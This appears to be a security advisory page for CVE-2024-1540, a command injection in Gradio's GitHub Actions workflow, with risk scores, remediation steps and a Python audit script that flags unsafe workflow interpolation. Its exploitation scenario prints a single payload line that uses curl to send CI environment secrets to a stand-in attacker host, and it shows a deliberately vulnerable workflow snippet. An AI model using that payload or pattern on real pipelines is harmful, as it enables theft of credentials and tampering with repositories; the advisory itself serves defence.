CVE-2024-1540: Gradio: CI/CD command injection enables secrets exfil

HIGH PoC AVAILABLE CISA: TRACK*
Published March 27, 2024
CISO Take

If your ML team uses Gradio or has forked its CI/CD workflows, your GitHub Actions secrets—cloud credentials, API keys, tokens—may be exposed to any external contributor who can open a pull request. Patch immediately by reviewing all workflow files for direct `${{ }}` interpolation in `run` steps and moving untrusted inputs to intermediate environment variables. Rotate any secrets stored in affected CI environments as a precaution.

Risk Assessment

High risk (CVSS 8.2) with low attack complexity and no authentication required—any external contributor can trigger this via a crafted PR. Gradio is one of the most widely deployed ML demo and prototype frameworks in the AI ecosystem, meaning the blast radius extends across research labs, startups, and enterprise ML teams. The primary concern is not the Gradio framework code itself but the CI/CD pipeline pattern, which many teams have copied or adapted. Secrets exfiltration is a silent, high-value outcome that may go undetected for weeks.

Affected Systems

Package   Ecosystem   Vulnerable Range   Patched
gradio    pip                            No patch
42.5K · OpenSSF 5.6 · 674 dependents · Pushed 8d ago · 27% patched · ~110d to patch


Severity & Risk

CVSS 3.1
8.2 / 10
EPSS
0.5%
chance of exploitation in 30 days
Higher than 67% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): Low
Availability (A): None

Recommended Action

6 steps
  1. Apply the patch from commit d56bb28 immediately if running self-hosted or forked Gradio workflows.

  2. Audit ALL GitHub Actions workflow files for `run` steps containing `${{ github.event.* }}` or any untrusted context expression—this pattern is the root cause.

  3. Refactor by assigning untrusted inputs to environment variables first (e.g., `ENV_VAR: ${{ github.event.pull_request.title }}`) before referencing them in shell commands.

  4. Rotate all GitHub Actions secrets (GITHUB_TOKEN scopes, cloud credentials, API keys) as a precaution.

  5. Enable GitHub's 'Require approval for all outside collaborators' workflow setting to gate execution on untrusted PRs.

  6. Use CodeQL or Semgrep with the GitHub Actions ruleset to detect similar injection patterns across all repos.

CISA SSVC Assessment

Decision Track*
Exploitation poc
Automatable Yes
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.10.2 - AI Supplier Relationships A.5.5 - AI System Security
NIST AI RMF
GOVERN 1.4 - Organizational Teams and Responsibilities MANAGE 2.4 - Mechanisms for Incident Response
OWASP LLM Top 10
LLM05:2025 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2024-1540?

If your ML team uses Gradio or has forked its CI/CD workflows, your GitHub Actions secrets—cloud credentials, API keys, tokens—may be exposed to any external contributor who can open a pull request. Patch immediately by reviewing all workflow files for direct `${{ }}` interpolation in `run` steps and moving untrusted inputs to intermediate environment variables. Rotate any secrets stored in affected CI environments as a precaution.

Is CVE-2024-1540 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-1540, increasing the risk of exploitation.

How to fix CVE-2024-1540?

1. Apply the patch from commit d56bb28 immediately if running self-hosted or forked Gradio workflows.
2. Audit ALL GitHub Actions workflow files for `run` steps containing `${{ github.event.* }}` or any untrusted context expression—this pattern is the root cause.
3. Refactor by assigning untrusted inputs to environment variables first (e.g., `ENV_VAR: ${{ github.event.pull_request.title }}`) before referencing them in shell commands.
4. Rotate all GitHub Actions secrets (GITHUB_TOKEN scopes, cloud credentials, API keys) as a precaution.
5. Enable GitHub's 'Require approval for all outside collaborators' workflow setting to gate execution on untrusted PRs.
6. Use CodeQL or Semgrep with the GitHub Actions ruleset to detect similar injection patterns across all repos.

What systems are affected by CVE-2024-1540?

This vulnerability affects the following AI/ML architecture patterns: ML deployment pipelines, CI/CD workflows, model training pipelines, and model serving infrastructure.

What is the CVSS score for CVE-2024-1540?

CVE-2024-1540 has a CVSS v3.1 base score of 8.2 (HIGH). The EPSS exploitation probability is 0.53%.

Technical Details

NVD Description

A command injection vulnerability exists in the deploy+test-visual.yml workflow of the gradio-app/gradio repository, due to improper neutralization of special elements used in a command. This vulnerability allows attackers to execute unauthorized commands, potentially leading to unauthorized modification of the base repository or secrets exfiltration. The issue arises from the unsafe handling of GitHub context information within a `run` operation, where expressions inside `${{ }}` are evaluated and substituted before script execution. Remediation involves setting untrusted input values to intermediate environment variables to prevent direct influence on script generation.

Exploitation Scenario

An adversary forks the Gradio repository or submits a pull request with a crafted PR title or branch name containing shell metacharacters—e.g., `'; curl https://attacker.com/exfil?t=$(cat /proc/self/environ | base64) #`. When the `deploy+test-visual.yml` workflow runs, it interpolates the GitHub context expression directly into a shell `run` step. The injected command executes in the CI runner, exfiltrating the `GITHUB_TOKEN`, any stored cloud provider credentials, and API keys. The attacker can use the `GITHUB_TOKEN` to push malicious commits, tamper with releases, or inject backdoored model artifacts into the deployment pipeline—all without ever having write access to the repository.
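The pattern described in the recommended actions, the NVD description and the scenario above, shown concretely: a workflow step that substitutes GitHub context straight into `run` script text, the same step after the advisory's remediation (untrusted values moved into intermediate environment variables), and a small audit function for steps 2 and 6 that flags `run` steps containing untrusted `${{ }}` expressions. This is an added example, not code from the advisory and not Gradio's actual `deploy+test-visual.yml`; both workflow snippets are constructed, and treating every `github.event.*` value and `github.head_ref` as untrusted is an assumption taken from the audit step rather than an exhaustive list of attacker-influenced contexts.

```python
import re
from typing import List, Tuple

# Constructed sample, not gradio's deploy+test-visual.yml: a step that
# interpolates attacker-controlled GitHub context straight into a shell script.
VULNERABLE_WORKFLOW = """\
name: visual-tests
on:
  pull_request_target:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: echo title
        run: |
          echo "PR title: ${{ github.event.pull_request.title }}"
          echo "Branch: ${{ github.head_ref }}"
"""

# Same step after the remediation from the advisory: untrusted values go into
# intermediate environment variables and the script reads them as data.
FIXED_WORKFLOW = """\
name: visual-tests
on:
  pull_request_target:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: echo title
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
          HEAD_REF: ${{ github.head_ref }}
        run: |
          echo "PR title: $PR_TITLE"
          echo "Branch: $HEAD_REF"
"""

# Assumption taken from the audit step: every github.event.* value and
# github.head_ref is attacker-influenced. Extend this list for other contexts.
UNTRUSTED_EXPR = re.compile(r"\bgithub\.(event\.[\w.\-\[\]*]+|head_ref)")
EXPRESSION = re.compile(r"\$\{\{(.*?)\}\}")
RUN_KEY = re.compile(r"^(\s*(?:-\s*)?)run:\s*(.*)$")


def find_injection_sinks(workflow_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, expression) for every untrusted ${{ }} expression
    that is substituted directly into a `run:` step's script text."""
    lines = workflow_text.splitlines()
    findings: List[Tuple[int, str]] = []
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        key_indent = len(m.group(1))  # column where the `run` key starts
        value = m.group(2).strip()
        script: List[Tuple[int, str]] = [(i + 1, value)]
        if value.startswith(("|", ">")):
            # Block scalar: the script is the following more-indented lines.
            script = []
            j = i + 1
            while j < len(lines):
                line = lines[j]
                indent = len(line) - len(line.lstrip(" "))
                if line.strip() and indent <= key_indent:
                    break
                script.append((j + 1, line))
                j += 1
            i = j
        else:
            i += 1
        for lineno, text in script:
            for expr in EXPRESSION.finditer(text):
                inner = expr.group(1).strip()
                if UNTRUSTED_EXPR.search(inner):
                    findings.append((lineno, inner))
    return findings


if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_WORKFLOW), ("fixed", FIXED_WORKFLOW)):
        print(f"{label}: {find_injection_sinks(text)}")
```

The fix works because the runner expands `${{ }}` into the script's source text before the shell ever parses it, so a title containing quotes or `$(...)` becomes shell syntax; an `env:` value is instead handed to the process as an environment variable and `"$PR_TITLE"` is expanded by the shell as a single data string. Keep the variable double-quoted in the script, and run the audit function over every file under `.github/workflows/` as a pre-merge check rather than only on the one workflow named in the advisory.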

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Timeline

Published
March 27, 2024
Last Modified
July 30, 2025
First Seen
March 27, 2024

Related Vulnerabilities